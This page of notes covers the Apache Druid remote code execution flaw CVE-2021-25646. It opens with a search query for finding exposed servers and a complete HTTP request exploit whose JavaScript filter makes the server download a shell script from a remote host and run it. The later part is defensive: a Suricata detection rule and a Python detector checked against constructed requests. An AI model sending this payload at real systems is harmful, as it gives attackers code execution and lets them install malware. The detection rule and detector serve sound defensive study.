Apache Druid RCE

title="druid" && title=="Apache Druid"

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: x.x.x.x:8888
Content-Length: 612
Accept: application/json, text/plain, */*
Origin: http://x.x.x.x:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json;charset=UTF-8
Referer: http://x.x.x.x:8888/unified-console.html
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript", "function":"function(value){return java.lang.Runtime.getRuntime().exec('wget http://x.x.x.x/1.txt -O /tmp/1.sh && sh /tmp/1.sh')}", "dimension":"added", "":{ "enabled":"true" } }}}},"samplerConfig":{"numRows":500,"cacheKey":"73a90acaae2b1ccc0e969709665bc62f"}}

Detection rules

alert http any any -> any any (msg:"ET EXPLOIT CVE-2021-25646 Apache Druid RCE POST"; flow:established,to_server; content:"POST"; http_method;content:"/druid/indexer/v1/sampler?for=filter"; http_uri; content:"java.lang.Runtime.getRuntime().exec(";http_client_body; nocase; reference:url,mp.weixin.qq.com/s/Eny6AnFarvvpjeEJNMfTrw; reference:cve,2021-25646; classtype:web-application-attack; sid:2031533; rev:2; metadata:affected_product Web_Server_Applications, created_at 2021_02_03, cve CVE_2021_25646, former_category EXPLOIT, signature_severity Major, updated_at 2021_02_03;)
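As an added example (not part of this repository), the same three matches the ET rule makes, written as a standalone Python check over constructed sample requests, plus a broader check that flags any JavaScript-typed object in a sampler spec, since CVE-2021-25646 is precisely that the sampler ran request-supplied JavaScript regardless of server configuration. The host name and request bodies below are constructed, not captured.

```python
import json
import re

# Constructed sample requests (not captures). The first is shaped like the PoC on this
# page: a sampler request whose transformSpec filter is a JavaScript function. Its exec()
# argument is a harmless 'id'; the detector does not look at the command at all.
SUSPICIOUS_REQUEST = (
    "POST /druid/indexer/v1/sampler?for=filter HTTP/1.1\r\n"
    "Host: druid.example.internal:8888\r\nContent-Type: application/json\r\n\r\n"
    '{"type":"index","spec":{"dataSchema":{"dataSource":"sample","transformSpec":{"filter":'
    '{"type":"javascript","function":"function(v){return java.lang.Runtime.getRuntime().exec(\'id\')}",'
    '"dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":500}}'
)
# Same endpoint, ordinary selector filter, no JavaScript: should produce no findings.
BENIGN_REQUEST = (
    "POST /druid/indexer/v1/sampler?for=filter HTTP/1.1\r\n"
    "Host: druid.example.internal:8888\r\nContent-Type: application/json\r\n\r\n"
    '{"type":"index","spec":{"dataSchema":{"dataSource":"sample","transformSpec":{"filter":'
    '{"type":"selector","dimension":"added","value":"1"}}}},"samplerConfig":{"numRows":500}}'
)

EXEC_PATTERN = re.compile(r"java\.lang\.Runtime\.getRuntime\(\)\.exec\(", re.IGNORECASE)  # rule's nocase body match


def _javascript_nodes(node, path="$"):
    """Yield the JSON path of every object declaring "type": "javascript"."""
    if isinstance(node, dict):
        if str(node.get("type", "")).lower() == "javascript":
            yield path
        for key, value in node.items():
            yield from _javascript_nodes(value, f"{path}.{key or '<empty>'}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _javascript_nodes(value, f"{path}[{i}]")


def inspect_request(raw: str) -> list:
    """Return findings for one raw HTTP request; an empty list means nothing matched."""
    head, _, body = raw.partition("\r\n\r\n")
    method, _, rest = head.split("\r\n", 1)[0].partition(" ")
    target = rest.split(" ", 1)[0]
    if method != "POST" or not target.startswith("/druid/indexer/v1/sampler"):
        return []  # the rule only fires on POSTs to the sampler endpoint
    findings = []
    if EXEC_PATTERN.search(body):
        findings.append("body contains java.lang.Runtime.getRuntime().exec( (ET sid 2031533 match)")
    try:  # broader check: any JavaScript-typed filter/transform in a sampler spec
        findings += [f"javascript object at {p}" for p in _javascript_nodes(json.loads(body))]
    except json.JSONDecodeError:
        findings.append("sampler body is not valid JSON")
    return findings
```

The broader check catches a JavaScript filter even when the function body avoids the literal `Runtime.getRuntime().exec(` string that the signature keys on.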